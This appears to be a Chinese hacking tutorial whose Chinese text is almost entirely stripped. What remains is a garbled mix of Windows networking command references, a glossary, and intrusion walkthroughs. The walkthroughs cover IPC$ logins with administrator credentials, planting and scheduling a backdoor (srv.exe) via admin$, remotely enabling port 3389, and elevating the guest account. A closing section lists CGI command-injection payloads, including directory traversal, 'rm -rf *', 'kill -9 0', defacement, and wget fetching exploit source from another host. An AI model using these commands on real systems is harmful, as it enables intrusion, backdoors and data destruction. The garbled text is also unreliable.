(TCP/IP)
IP
route print
IP
10.
route print 10.*
192.168.12.1
route add 0.0.0.0 mask 0.0.0.0 192.168.12.1
10.41.0.0 255.255.0.0
10.27.0.1
7
route add 10.41.0.0 mask 255.255.0.0 10.27.0.1 metric 7
10.41.0.0 255.255.0.0
10.27.0.1 0x3
route add 10.41.0.0 mask 255.255.0.0 10.27.0.1 if 0x3
10.41.0.0 255.255.0.0
route delete 10.41.0.0 mask 255.255.0.0
IP
10.
route delete 10.*
10.41.0.0 255.255.0.0
10.27.0.1 10.27.0.25
route change 10.41.0.0 mask 255.255.0.0 10.27.0.25
windowsserver cmd ip -> Windows 2k/2003
Server
ip
Windows2000
Unix ip
C:\>ipconfig (ipconfig ip )
Windows 2000 IP Configuration
Ethernet adapter :
Connection-specific DNS Suffix .:
IP Address............: 10.1.1.94 ip
Subnet Mask ...........: 255.255.255.0
Default Gateway .........: 10.1.1.254
C:\>netsh
netsh>interface
interface>ip
interface ip>set address " " static 10.1.1.111
255.255.255.0 10.1.1.254
interface ip>exit
set :
set address - IP
set dns - DNS
set wins - WINS
IPCONFIG
C:\>ipconfig ipconfig
,
Windows 2000 IP Configuration
Ethernet adapter :
Connection-specific DNS Suffix .
IP Address............: 10.1.1.111
Subnet Mask ...........: 255.255.255.0
Default Gateway .........: 10.1.1.254
..-
? -
aaaa - `aaaa'
abort -
add -
alias -
bye -
commit -
delete -
dhcp - `dhcp'
dump -
exec -
exit -
help -
interface - `interface'
offline -
online -
popd -
pushd -
quit -
ras - `ras'
routing - `routing'
set -
show -
unalias -
wins - `wins'
IP
IP Win2000 IP Win98
IP
IP
?
Win2000 netsh
""
"cmd" netsh
netsh
int ip
IP dump IP
# ---------------------------------# IP
# ---------------------------------pushd interface ip
# IP
set address name =
netsh IP 192.168.0.7
255.255.255.0
C:\Documents and Settings\Administrator>netsh
netsh>int ip
interface ip>set address name =" "source = static addr
= 192.168.0.7 mask = 255.255.255.0
interface ip>exit
ipconfig
C:\Documents and Settings\Administrator>ipconfig
Windows 2000 IP Configuration
Ethernet adapter 2
Media State ........... Cable Disconnected
Ethernet adapter
Connection-specific DNS Suffix .
IP Address............ 192.168.0.7
Subnet Mask ........... 255.255.255.0
Default Gateway ......... 192.168.0.2
Win2000
IP IP
int ip
set address name= source=static addr=192.168.0.7
mask=255.255.255.0
"7.sh" C C
"netsh exec 7.sh" ? ipconfig
IP
IP
"addr" IP
172.19.96.7
IP
int ip
set address name = source = static addr= 172.19.96.7
mask = 255.255.255.0
set address name = gateway = 172.19.96.1 gwmetric
=1
ipconfig/all
IP ?
netstat
netstat TCP/IP netstat -a
netstat -r netstat -e
Ethernet
netstat -s netstat -n
Tracert IP
Tracert IP (TTL) ICMP
-d IP
-h maximum_hops target_name
-j host-list Tracert
-w timeout timeout
target_name IP
pathping
ping tracert
pathping
-n Hostnames
-h Maximum hops
-g Host-list
-p Period ping
-q Num_queries
-w Time-out
-T Layer 2 tag 2 IEEE 802.1p
2
-T
(QoS)
DHCP
netsh
netsh>(Netshell) "dhcp"
dhcp> DHCP
server \\servername server ip_address
" servername
"
DHCP Netshell
/? help
DHCP list DHCP
Netshell
route
routing ip add/delete/set/show interface
IP
routing ip add/delete/set/show filter
IP
routing ip add/delete/show boundary
IGMP
IPX netsh
routing ipx add/set staticroute IPX IPX
routing ipx add/set staticservice SAP SAP
dump WINS
add name add name /?
add partner add partner /?
add pngserver Persona Non Grata
add pngserver /?
check database check
database /?
check name WINS
check name /?
check version check
version /?
delete name
delete name /?
delete partner
delete partner /?
delete records
delete records /?
delete owners delete
owners /?
delete pngserver Persona Non Grata
delete pngserver /?
init backup WINS init backup /?
init import Lmhosts init import /?
init pull "" WINS
init pull /?
init pullrange WINS
init pullrange /?
init push "" WINS
init push /?
init replicate init
replicate /?
init restore init restore /?
init scavenge WINS init
scavenge /?
init search WINS init search /?
reset statistics reset
statistics /?
set autopartnerconfig
set autopartnerconfig /?
set backuppath set
backuppath /?
set burstparam set
autopartnerconfig /?
set logparam set
logparam /?
set migrateflag set
migrateflag /?
set namerecord set
namerecord /?
set periodicdbchecking
set periodicdbchecking /?
set pullpartnerconfig ""
set pullpartnerconfig /?
set pushpartnerconfig ""
set pushpartnerconfig /?
set pullparam " " set
pullparam /?
set pushparam " " set
pushparam /?
set replicateflag set
replicateflag /?
set startversion ID set
startversion /?
show browser [1Bh]
show browser /?
show database
show database /?
show info show info /?
show name show
name /?
show partner """"
""
show partner /?
show partnerproperties show
partnerproperties /?
show pullpartnerconfig ""
show pullpartnerconfig /?
show pushpartnerconfig ""
show pushpartnerconfig /?
show reccount
show reccount /?
show recbyversion
show recbyversion /?
show server show server /?
show statistics WINS show
statistics /?
show version WINS
show version /?
show versionmap ID ""
show versionmap /?
Interface
interface set/show interface
WAP
RFC1459 IRC
DCC
UNIXLinuxMacBSDWindows2000Windows95/98/MeWindows NT
Linux
Apache
Windows2000 Ftpd
ftp
IP
IP IP
IP
IP
IP IP
IP
IP
65535 65535
80
IRC
6667
1026
Perl
IP
DES
1
Internet: International Net
1969
Internet
(Email) (Telnet)
(Finger)(FTP)(Archive)
(Usenet)
Internet
Remote Login: ()
Internet
FTP
Gopher: guf()
Internet
FTP() Telnet(IP )
Internet
WAIS
Wide Area Information Service
Internet
Luisitserv: Internet
IRCInternet Relay Chat,
Hypertext:
( )
Hyperlink:
WWW
HTML
(Home Page)
HTML
HTML WWW
Hypermedia:
IEInternet Explorer,Explorer
2
VF
Fox
Pro Progress
VCVisual C C
C BASIC
C
VBVisual Basic
BASIC Beginners All purpose Sybolic Instruction Code(
Delphidelfai
(Borland)
Java
/dav()
(Sun)Java
Internet
)
PC UNIX
PDA()
SQLStructure Query Language
SQL
3
PCPersonal Computer
MMX CPU ()
MHz Mega
Hertz MMXTM
TM Trade Mark
OOP: Object Oriented Programming,
28VGA: 28 ()
100
VGA Video
Graphics Array()
FATAllocation Table,
()
EPA EPA POLLUTION
PREVENTER
IC Intelligent Card,
ATX
IDE
DLLDynamic Link Library,
KBKilo ByteKB K=Kilo
B=Byte (
)
MBMega ByteMB M=Mega
GBGiga Byte,GB G=Giga
CAIComputerAsisted Instruction ComputerAided Instruction,
CADComputerAided Design
ISO International Standard Organization, ISO
1987 ISO 9000 1994
ISO 9000
1.ISO 90001:1994
2.ISO 9001:1994
3.ISO 9002:1994
3DS 3D Studio: Three Dimension Studio,
Autodesk
AutoCAD
VGA
VRVirtual Reality 3D
OCR
OCR TH
OCR NT for Windows
SCSISmall Computer System Interface,
Window98
PNP PC
(IRQ) (DMA)
Windows98 IRQ
DMA
OLEObject Linking and Embedding, OLE
OLE
()
(Component Object Model), COMOLE
MIDI
MIDI MIDI
(FM )
MPEG
Motion Picture Experts Group
MPEG MPEG
MPEG
MPEG
10
ADSL
ADSLAsymetric Digital Subscriber Loop
640Kbps
7Mbps
1.
2.
3.
4.
5. INTERNET
INTERNET
MODEM
INTERNET
ADSL
ASP
ASP Active Server Pages
HTML
ASP CGI
Web
Internet
Web Web
Web Web
B2B
www.Alibaba.com
B2B
B2C
Internet
www.amazon.comwww.1hao.com
BBS
BBS
BBS Unix WWW BBS Unix
BBS Telnet BBS
BBS BBSbbs.gznet.com
CNNIC
CNNIC 1997 6 3
CNNIC
CNNIC
CNNIC CNNIC
CNNIC
CIO
CIO Chief Information Officer
CTO
CTO Chief Technology Officer
COO
COO Chief Operation Officer
CFO
CFO Chief Financial Officer
CGO
CGO Chief Government Officer
Plug-in
Web
DDN
DDNDigital Data NetworkDDN
A B
DDN
N*64k 2M
DDN
1"
"
POS
2"
"
3
EC E-Commerce
Internet
BtoB B2B
BtoC B2C CtoC
C2C CtoB C2B
www.Alibaba.comwww.8848.netwww.1hao.com
E-mail
E-mail
Email yourname@xxx.xxx
yourname@yahoo.com
@ at
Internet
E-mail Internet
Internet E-mail
www.163.net
FTP
FTP File Transfer Protocol Internet
Internet
Internet
FTP CutFTP
FTP
FAQ
FAQ Frequently Asked Questions
FAQ
Firewall
Homepage
Homepage Pages
Homepages Pages
www.microsoft.comwww.ibm.com
Homepage
Homepage Pages
Homepages Pages
Supercool.163.netcarboy.163.net
HTTP
HTTPHypertext Transfer Protocol WWW
WWW HTTP TCP/IP
Hacker
Internet
Internet 70
ARPA
Internet
LANMAN
WAN
Internet
Internet
ISP
ISPInternet Service Provider Internet
ISP InternetISP
ISP
ICP
ICP
ICQ
ICQ I seek you
ICQ www.icq.com
IP
IP Internet
IP 32
202.112.223.12
IP ABC IP
IP
ABC
0.0.0.0-127.255.255.255
128.0.0.0-191.255.255.255
192.0.0.0-223.255.255.255
IP
IP
NIC Internet
IP
IP
IP VoIPVoice over Internet protocol
Internet
VocalTec
163
163
163
Modem 163
www.163.com
163 www.163.net
ISOC
ISOCInternet Society
1992 (
)
(IAB)
(IETF) (IESG)
(IEPG) (IANA)
Intranet
Internet
Internet
Web Web
FTP Internet
wideband transmission
20
Browser
WWW
WWW
Offine
WWW
MODEM
MODEM
Modem
Modem
Modem
POP3
POP3 Post Office Protocol version3 3
POP3
SMTP
SMTP Simple Mail Transmission Protocol
SMTP
WWW
WWW
www.yahoo.comwww.sohu.com
Upload
Downloan Down
SET
SET Secure Electronic Transaction VISA
MasterCard 1997 5 SET
SET
SET SSL
SSL
SSL Secure Socket Layer Netscape
SSL SSL
SQL
SQL sequel S-Q-L
MICROSOFT
WAP
WAP
Nokia7110Siemens3568iMotorola a6188
WWW
WWW World Wide Web
Web
WWW
News FTP
Telnet Gopher Mail
www.sina.com.cnwww.163.com
WWW
Web
ServerFTP ServerMail Server
Database Server
www.yahoo.comwww.163.net
TCP/IP IPX/SPX
NetBIOS TCP/IP
Internet
BBS Fido
Internet WWWFTPEmail
32
IP Internet
www.cctv.com Internet
.com .net
.edu .gov().mil .org
cnus
ukhksupercool.163.net
ISDN
2 64Kbps
128Kbps
Internet Internet
Online
Payment Gateway Internet
Internet
Internet
11
[hacker]
(hacker) hack
()
50
6070
(password cracking)
(trapdoor)(backdoor)(Trojan horse)
"",.
.
"",.
() Trojan house
[]
,,
!
, ,
, ,
,.
rootkit
Rootkit rootkit
wtmputmp lastlog rootkit
telnetshell finger
/var/log /var/adm
,
,.
IPC$
IPC$(Internet Process Connection) " "
IPC$ NT/2000 IP
NT/2000 ipc$
(c$,d$,e$ )
winnt
windows(admin$)
[],
Windows 2000/XP/2003
$
C$D$E$ Winnt Windows[admin$]
shell
shellshell
shell :
webshell
webshell ( ) WEB
WEB
,
"".
,.
[]
http://www.xxx.com/soft.asp?id=123
domain d
1. WHOIS
2.
3.
webshell
4.
:Serv-u IIS
LOG
5. Admin )
6. ASP
[]
,,?
,
VIP
.,
, . ,
, VIP
,.
?
Computer Virus
?
clientserver
?
Firewall
?
Back Door
NIDS
NIDS Network Intrusion Detection System
Hacker Cracker
NIDS
Hub
SYN ?
TCP SYN
?
Worm1988 22
Robert Morris
UNIX Worm 6000
200 6000
CERT
99
Unix
Finger
Mail
DDoS
DDoS
ARP
ARP IP
MAC
ARP
ARP Mac
ARP
:
1. XXX XXX
2.
ARP
:HONEYPOT HONEYPOT
:IP ARP DNS Web
12
135137138139445
?
192.***.xx.x
IP 4
45
Standard: Solaris 2.x, Linux 2.1.???, Linux 2.2, MacOS
Telnet (23/tcp)
ssh (22/tcp)
ftp (21/tcp) (
)
netstat (15/tcp)
daytime (13/tcp)
systat (11/tcp)
echo (7/tcp)
time (37/tcp)
smtp (25/tcp)
www (80/tcp) (
)
finger (79/tcp)
auth (113/tcp)
sunrpc (111/tcp)
pop-2 (109/tcp)
linuxconf (98/tcp)
imap2 (143/tcp)
printer (515/tcp)
shell (514/tcp)
login (513/tcp)
exec (512/tcp)
unknown (693/tcp)
unknown (698/tcp)
unknown (727/tcp)
swat (910/tcp)
unknown (1025/tcp)
unknown (1039/tcp)
unknown (1038/tcp)
unknown (1037/tcp)
unknown (1035/tcp)
unknown (1034/tcp)
unknown (3001/tcp)
unknown (6000/tcp)
echo (7/udp)
general/tcp
daytime (13/udp)
unknown (728/udp) (
)
unknown (2049/udp)
unknown (681/udp)
unknown (2049/tcp)(
)
telnet (23/tcp)
(21/tcp)
/incoming
ftp
(21/tcp)
ftp TELNET
CWD ~XXXX CWD ROOT
(guest),
13/tcP(daytime)
udp
UDP
ECHO(7/tcp)
(25/tcp)smtp
EXPN VRFY
EXPN
VRFY
user@hostname1@victim
user@hostname1
WWW(80/TCP)
WWW
finger (79/tcp)
finger
auth (113/tcp)
ident
(
ROOT )
(98/tcp) LINUX
(513/tcp) RLOGIN
TELNET
exec (512/tcp)
rexecd ,
IP
UNIX UNIX 0
WIN2000
WIN2K
230M
PING
5.0 GOOGLE N
NSS
NSS Perl
Sendmail
FTP
NFS
TFTP
Hosts.equiv
Xhost
NSS Hosts.equiv
NSS
AppleTalk
Novell
LAN
NSS
Ping
NSS
NSS NSS
$TmpDir_NSS
$YPX-ypx
$PING_ ping
$XWININFO_xwininfo
Perl include
Perl include
PATH
NSS ftplib.pl NSS
NSS
NSS
NSS
http://www.giga.or.at/pub/hacker/unix
Strobe TCP
strobe TCP strobe
strobe
strobe strobe
strobe
socket
strobe
strobe Solaris 2.3
getpeername()
-g
strobe
ISS strobe
/var/adm/messages
SATAN
SATAN UNIX C Perl
HTML UNIX
Linux SATAN
Linus tcp-scan
select()
fping
socket
Linux SATAN diff
ftp.lod.com
Sun sunsite.unc.edu diff
/pub/linux/system/network/admin/satan-linux.1.1.1.diff.gz
SATAN
FTPD
FTP
NFS
NIS
RSH
Sendmail
X
SATAN http://www.fish.com
SATAN SATAN
/satan-1.1.1 Perl
reconfig
PATH DNS
DNS /satan-1.1.1/conf/satan.cf
$dont_use_nslookuo=1
IRIX SunOS
SATAN
SATAN
100
SATAN
Jakal
Jakal
half scans
SYN/ACK
Courtney GAbriel
Half lifeJeff(PhiJi)Fay Abdullah Marahie
Jakal http://www.giga.or.at.pub/hacker/unix
IdentTCPscan
IdentTCPscan TCP
UID
.CONNECT
CONNECT bin/sh
TFTP
FSPScan
FSPScan
FSP
FSP *FSP
FTP FTP
E-mail FSP
XSCAN
XSCAN
SSSShadow
Security Scanner
http://www.20cn.net/cgi-bin/download/down.cgi?list=scaner
SSS
NAMP
http://www.91one.net/dvbbs/dispbbs.asp?
boardid=17&id=1362&star=1#1362
PING
shellshell UNIX
xx
SHELL
http://www.91one.net/dvbbs/dispbbs.asp?boardid=17&id=1426
,
shell telnetshell
telnet
winshell
http://978229.myrice.com/tty/Preview.htm#MAILLISTDOC19
shell
Win2K
http://www.yesky.com/20010530/182273.shtml ;
Microsoft
SQL
Server
Webtasks
http://www.mhdn.net/se/2002-11-08/6386.html
Linux
kernel
ptrace
http://www.softhouse.com.cn/docs/southpark2169.html
IIS
http://moon-soft.com/e_commerce/soft/doc/readelite572760.htm
win2000
D
shell
Shell ?
UNIX
Shell(DOS command UNIX )Shell
dos
command.com
shell
http://www.91one.net/dvbbs/dispbbs.asp?boardid=17&id=769
13
3389
3389
3389
(
scanner3.0 xscan scanner IP
scanner 3389
IP
3389 IP
IP TXT
xscan
SQL-Server NT-Server
IP TXT
3.0 mstsc
cmd.exenet use
net view\\
!
Windows Macintosh UNIX
*
Windows
Windows
Windows 2000
Windows 2000 Professional
Windows 2000
Windows 2000
MS-DOS Windows
Macintosh
UNIX
MS-DOSMacintosh UNIX
Windows 2000 Server
Windows 2000 Server
(DFS) (DFS)
DFS DFS
Windows 2000
Server
Windows 2000 Server Active Directory
Windows 2000 Server
40 128 128
TCP/IP
RDP-TCP
RDP RDP
RDP-TCP
/ Internet
Citrix CA
Citrix CA Citrix CA
Citrix CA TCP/IP
IPX/SPX
NetBIOS
3389
3389 . 3389
,M$
, :winnt4/win2000server/win2000ADVserver/win2000DS/XP .
winnt4
,2000 ,.
, win2000server server .(
).
..
: 192.168.0.1
: administrator
: 7788
2000
c:\winnt
,2000 ,
.
: c:\>letmein \\192.168.0.1 -all -d
stating connecting to server ...
Server local time is: 2002-1-13 10:19:22
Start get all users FORM server...
-------------------------Total = 5
-------------------------num0= Administrator ()
num1= Guest ()
num2= IUSR_servername (Internet )
num3= IWAM_servername ( IIS )
num4= TsInternetUser (TsInternetUser)
-------------------------Total = 5
-------------------------- num2/3/4 2000server
.
2000 .
:
:superscan3.exe
25,3372 2000server .
,
:cmdinfo.zip
2 NT/2K
,
,
,PACK ,
, ,
.
.
,:,
, .
3 ,
,
cmdinfo
2000 , 3389 .
? :?3389
, ,
3389
?
1.
termservice "
">>>""
.
2.
RDP "
">>>""
.
3.
3389 . 3389
4..
5.
.
6.....(
)
, 5 .
.,
C Z
net use z: \\192.168.0.1\c$ "7788" /user:"administrator"
Z
,
Z:\Documents and Settings\All Users\\\
>
"
"""
,,(98% )
telnet .,
,
:
telnet , ., 2000
telnet ,
,.(~,!)
,.
.abu. WIN2K TELNET
,
(
,),
telnet .
23
,
telnet 192.168.0.1
/
*======================================
=========================
Microsoft Telnet
*======================================
=========================
C:\>
\\
!!!! ,
:
c:\>query user
. .
:
USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME
>w1 console 0 .2002-1-12 22:5
\\,
.!,
.
--------------------------------------------------C:\>dir c:\sysoc.inf /s // INF
c:\WINNT\inf 2000-01-10 20:00 3,770 sysoc.inf
1 3,770
----------------------------------------------------C:\> dir c:\sysocmgr.* /s //
c:\WINNT\system32 2000-01-10 20:00 42,768 sysocmgr.exe
1 42,768
----------------------------------------------------c:\>echo [Components] > c:\wawa
c:\>echo TSEnable = on >> c:\wawa
//
c:\>type c:\wawa
[Components]
TSEnable = on
//
/R
.,,
,
3389 ..
: A
,/R,
,
:iisreset /reboot
,
, , .B
, .C sysocmgr
,
,, sysocmgr ,,
.,
B .
C ,?
( )
WIN2000
WIN2000
WIN2000
WIN2000
3389
WIN2000
WIN2000
3389
WIN2000
CTRL+SHIFT
URL
WIN2000
"c:\winnt\system32"
SYSTEM32
"net.exe""net.exe"
> >c:\winnt\system32\net.exe "user guest
/active :yes" net.exe
guest
"user add"
guest
"user guest " guest
localgroup administrators guest /add guest
id
ip
"guest" guest
Microsoft
Telnet
Tools Srv.exe, ntml.xex
Telnet
99
copy c:\hack\srv.exe \\***.***.***.***\admin$
srv.exe:
at \\***.***.***.*** 09:00 srv.exe
ID = 0
telnet ***.***.***.*** 99
c:\winnt:\system32>
23 guest
net.exe winnt\system32\logfiles
14
http://www.91one.net/dvbbs/dispbbs.asp?boardID=14&ID=403
Port Mapping
Internet
Internet FTP
IP IP
IP
Internet IP IP
Internet
PM
http://www.pconline.com.cn/pcedu/soft/lan/jywgl/10301/127157.html
Remote Administrator
http://www.pcworld.com.cn/2002/back_issues/2205/0533e.asp
http://www.skycn.com/soft/15592.html
20cn
scanipc
http://down.yqdown.com/xdown/yqdown0316/scanipc.rar
IP
opentelnet TELNET
http://www.infosw.com/down/software.asp?id=1520
telnet
, 23 !
Opentelnet :
OpenTelnet.exe \\server <> <>
:
C:\>OpenTelnet.exe \\192.168.1.2 administrator 123456 1 90
administrator 123456
NTLM
:1( 0 )
90
Disconnecting server...Successfully!
90
Telnet
Telnet 192.168.1.2 90
WinShell(
http://www.hktk.com/soft/soft_server/winshell.html) winshell
FTP
:
c:\>ftp
ftp>openwww.cnwill.com
mput c:\cnwill.exe
Telnet 192.168.1.2 90
( )
net
long
[ , ]
15
telnet
telnet,,,
*, telnet ,
telnet, telnet?Telnet /
Telnet
?
, : Telnet
Telnet
Telnet
Ip
Telnet 4
1 TCP
Ip
2
NVTNet Virtual Terminal
IP
3 NVT
4 TCP
Internet
Telnet
1Telnet
2Telnet
3Telnet Telnet
,,,
Telnet HELP
Telnet
AllowTrustedDomain 1
0:
DefaultDomain
"."
DefaultShell shell %systemroot
%\System32\Cmd.exe /q /k
MaxFailedLogins
3
LoginScriptTelnet
%systemroot%\System32\login.cmd
Telnet
NTLMNTLM 2
0: NTLM
1: NTLM
2: NTLM
TelnetPorttelnet
telnet 23
tlntadmn.exeTelnet
Telnet 1
2 NTLM
telnet NTLM
NTLM win2000
telnet
NTLM NTLM
NTLM
SMB "LAN Manager
Challenge/Response"LM
WindowsNT / NTLM
NTLMv2 Kerberos
NTLM
1
2
3 16
challenge
4 challenge
response
5 challenge
response
6 SAM
challenge
7
challenge
NTLM
Telnet
A B
A xinxin 1234 B
Administrator 5678 Telnet B NTLM
7 xinxin 1234
Administrator 5678
Telnet NTLM
3 Telnet
1)
=0
=====================================
Microsoft (R) Windows (TM) Version 5.00 (Build 2195)
Welcome to Microsoft Telnet Service
Telnet Server Build 5.00.99201.1
login:
password:
\\ 0 NTML
Administrator 5678
2)
=1
=====================================
NTLM Authentication failed due to insufficient credentials.Please
login withclear text username and password
Microsoft (R) Windows (TM) Version 5.00 (Build 2195)
Welcome to Microsoft Telnet Service
Telnet Server Build 5.00.99201.1
login:
password:
\\ NTLM
3)
=2
=====================================
NTLM Authentication failed due to insufficient credentials.Please
C:\>
\\
NTLM
1 telnet 2 1
0
2 NTLM.exe telnet
1
3 telnet
4 opentelnet.exe
IPC
5 RTCS
IPC
5
telnet
OpenTelnet.exe
\\server
username
password
NTLMAuthor
telnetport
OpenTelnet.exe \\
0 1 telnet
>
telnet ? ,
1
,,
1
type
c:\boot.ini pro server
2 tftp
telnet ipc
net share ipc$
copy
shell(
)TFPT TFTP
TFTP(Trivial File Transfer Protocol)
UDP Windows tftp.exe TFTP
TFTP Server
tftpd32.exe telnet
shell
C:\>tftp i ip get xinxin.exe c:\abc\xinxin.exe
ip ip TFTP
xinxin.exe c abc
tftp
IP
IP
MAC
TFTP
3
, .
asp
telnettelnet shell
( copy ,)
1
cmd telnet
3389
'hacking'
ipc$
5
()
,,,
16
2
SID ,
SAM\Domains\Account \Users F
admin F F
SAM
http://www.91one.net/dvbbs/dispbbs.asp?boardid=17&id=1427
ca.exe
http://www.hejie.net/xz/list.asp?id=926
SYSTEM
psu.exe
www.sometips.com/soft/psu.exe
17
PING
ping
C:\>ping 10.1.1.2
Pinging 10.1.1.2 with 32 bytes of data:
Reply from 10.1.1.2: bytes=32 time<10ms TTL=128
Reply from 10.1.1.2: bytes=32 time<10ms TTL=128
Reply from 10.1.1.2: bytes=32 time<10ms TTL=128
Reply from 10.1.1.2: bytes=32 time<10ms TTL=128
Ping statistics for 10.1.1.2:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms
C:\>
C:\>ping 10.1.1.6
Pinging 10.1.1.6 with 32 bytes of data:
Request timed out.
Reply from 10.1.1.6: bytes=32 time=250ms TTL=237
Reply from 10.1.1.6: bytes=32 time=234ms TTL=237
Reply from 10.1.1.6: bytes=32 time=234ms TTL=237
Ping statistics for 10.1.1.6:
Packets: Sent = 4, Received = 3, Lost = 1 (25% loss),
Approximate round trip times in milli-seconds:
Minimum = 234ms, Maximum = 250ms, Average = 179ms
TTL
1 80
telnet 80
C:\>telnet 10.1.1.2 80
get
C:\>
windows
C:\>
UINX
2 21
FTP
C:\>ftp 10.1.1.2
Connected to 10.1.1.2.
220 sgyyq-c43s950 Microsoft FTP Service (Version 5.0).
User (10.1.1.2:(none)):
win2000
sgyyq-c43s950
FTP windows IIS FTP
Connected to 10.1.1.3.
220 Serv-U FTP Server v4.0 for WinSock ready...
User (10.1.1.3:(none)):
windows Serv-U FTP windows
FTP
Connected to 10.1.1.3.
220 ready, dude (vsFTPd 1.1.0: beat me, break me)
User (10.1.1.3:(none)):
UINX
3 23 telnet
SunOS 5.8
login:
UINX SunOS 5.8
TCP/IP
TCP/IP TCP/IP
nmap,
http://www.linuxeden.com/download/indexsoft.php?
category=syssecure
supersan
http://www.xfocus.net/tools/200206/ 1.0.5.zip
18
FTP SQL
FTP FTP
FTP
FTP FTP
FTP
FTP
FTP
UNIX
FTP
^^^)
FTP
FTP
FTP ftp -v -d -i -n -g [
]
-v
-n
ftp .n etrc
-d
-g
FTP ():
1.![cmd[args> shell exit ftp !
ls*.zip
2.$ macro-ame[args] macro-name
3.account[password]
4.append local-file[remote-file]
5.ascii
ascii
6.bell
7.bin
8.bye ftp
9.case
mget
10.cd remote-dir
11.cdup
12.chmod mode file-name
file-name
mode chmod 777 a.out
13.close ftp ( open )
14.cr
asscii
15.delete remote-file
16.debug[debug-value]
deb up 3 0 debug
17.dir[remote-dir][local-file]
18.disconnectionclose
19.form format format file
20.get remote-file[local-file]
remote-file
local-file
21.glob mdeletemgetmput
-g
22.hash
1024 hash (#)
23.help[cmd]ftp cmd help get
24.idle[seconds][seconds]
25.image(binary)
26.lcd[dir] dir
27.ls[remote-dir][local-file] remote-dir
local-file
28.macdef macro-name macdef
29.mdelete[remote-file]
30.mdir remote-files local-filedir
mdir *.o.*.zipoutfile
31.mget remote-files
32.mkdir dir-name
35.modtime file-name
36.mput local-file
38.nlist[remote-dir][local-file]
local-file
39.nmap[inpattern outpattern]
nmap $1.$2.$3[$1$2].[$2$3]
a1.a2.a3 a1a2 UNIX
40.ntrans[inchars[outchars>
ntrans1R LLL RRR
41.open host[port]ftp
42.passive
43.prompt
44.proxy ftp-cmd
ftp ftp
ftp
open
45.put local-file[remote-file] local-file
46.pwd
47.quitbye ftp
48.quote arg1arg2...
ftp
quote syst.
49.recv remote-file[local-file]get
50.reget remote-file[local-file]
get local-file
51.rhelp[cmd-name]
52.rstatus[file-name]
53.rename[from][to]
54.reset
55.restart marker marker get put restart
130
56.rmdir dir-name
57.runique.
1.2
58.send local-file[remote-file]put
59.sendport PORT
60.site arg1arg2...
SITE ftp
64.sunique( runique )
65.system
66.tenex TENEX
67.tick
68.trace
69.type[type-name] type-name ascii
:type binary
70.umask[newmask]
-v ftp
on.
73.?[cmd]help.
FTP
FTP ,!!
FTP .
anonymous ftp
Anonymous FTP
@ FTP
/etc/passwd /etc/group
FTP FTP
E-mail passwd
@ E-mail
FTP
chroot
FTP FTP
FTPFTP
FTP
chroot
FTP inetd
FTP chroot
chrootuid
FTP
chroot
FTP
FTP
/etc/passwd
telnet ftp21 SITE
CHMOD SITE EXEC/home FTP
****
FTP scanner
http://sorry.vse.cz/~xmicm08/FTPScanner/
FTP Scanner
:Host
,Beginning , IP
IP.Ending IP
. IP.
Threads
. Moden 50--70 .
100
View options
Login config
UserName Password
Oracle
Oracle UserName Password
IP Logging
iplog.txt
ftp> get /etc/passwd
shell OK
anonymous
IP
19
80
80 ,,.
( host
)
1'.' '..' '...'
web web
web
CGI '..'
Example:
http://host/cgi-bin/lame.cgi?file=../../../../etc/motd
mosd web
2'%20'
%20 16
web
Example:
http://host/cgi-bin/lame.cgi?page=ls%20-al|
unix
3'%00'
%00 16 web
Examples:
http://host/cgi-bin/lame.cgi?page=index.html
cgi
http://host/cgi-bin/lame.cgi?page=../../../../etc/motd
cgi
html.shtml
http://host/cgi-bin/lame.cgi?page=../../../../etc/motd%00html
cgi
4'|'
unix
Example:
# cat access_log| grep -i '..'
..
web IDS
http://host/cgi-bin/lame.cgi?page=../../../../bin/ls|
http://host/cgi-bin/lame.cgi?page=../../../../bin/ls%20-al%20/etc|
unix /etc
http://host/cgi-bin/lame.cgi?page=cat%20access_log|grep%20-i
%20'lame'
cat
grep
lame'
(5)';'
unix
Example:
# id;uname -a
id
uname
web IDS
web IDS
(6'<' '>'
Example 1:
# echo 'your hax0red h0 h0' >> /etc/motd motd
)
web
RDS exploit web
Example 2:
http://host/something.php=Hi%20mom%20Im%20Bold!
html
web
16
7'!'
Example:
http://host1/something.php=
host2
host1
16
web
Example:
http://host/something.php=
id' web
id
nobody'www'
Example:
http://host/something.php=
.htpasswd ,Apache
.ht SSI
8 ' web PHP
php
Example: http://host/something.php=
php web
9'`'
perl web
Example:
http://host/something.cgi=`id`
perl
cgi id
,,
,.,
'/bin/ls'
web
web
cgi,asp,php...etc)
Example:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/ls%20-al|
http://host/cgi-bin/bad.cgi?doh=ls%20-al;
'cmd.exe'
windows shell,
windows
80
http://host/scripts/something.asp=../../WINNT/system32/cmd.exe
?dir+e:
'/bin/id'
2
/bin/ls
Example:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/id|
http://host/cgi-bin/bad.cgi?doh=id;
'/bin/rm'
Examples:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/rm%20-rf%20*|
http://host/cgi-bin/bad.cgi?doh=rm%20-rf%20*;
'wget and tftp'
wget unix
tftp unix nt
IIS tftp
Examples:
http://host/cgi-bin/bad.cgi?doh=../../../../path/to-wget/wget
%20http://host2/Phantasmp.c| http://host/cgi-bin/bad.cgi?doh=wget
%20http://www.hwa-security.net/Phantasmp.c;
'cat'
Examples:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/cat
%20/etc/motd| http://host/cgi-bin/bad.cgi?doh=cat%20/etc/motd;
'echo'
index.html
Examples:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/echo
%20'fc-#kiwis%20was%20here'%20>>%200day.txt| http://host/cgibin/bad.cgi?doh=echo%20'fc-#kiwis%20was%20here'%20>>
%200day.txt;
'ps'
Examples:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/ps%20-
aux| http://host/cgi-bin/bad.cgi?doh=ps%20-aux;
'kill and killall'
unix
exploit
Examples: http://host/cgi-bin/bad.cgi?doh=../bin/kill%20-9%200|
http://host/cgi-bin/bad.cgi?doh=kill%20-9%200;
'uname'
web
isp
uname
-a
Examples:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/uname
%20-a| http://host/cgi-bin/bad.cgi?doh=uname%20-a;
'cc, gcc, perl, python, etc...' /
Examples:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/cc
%20Phantasmp.c|
http://host/cgi-bin/bad.cgi?doh=gcc
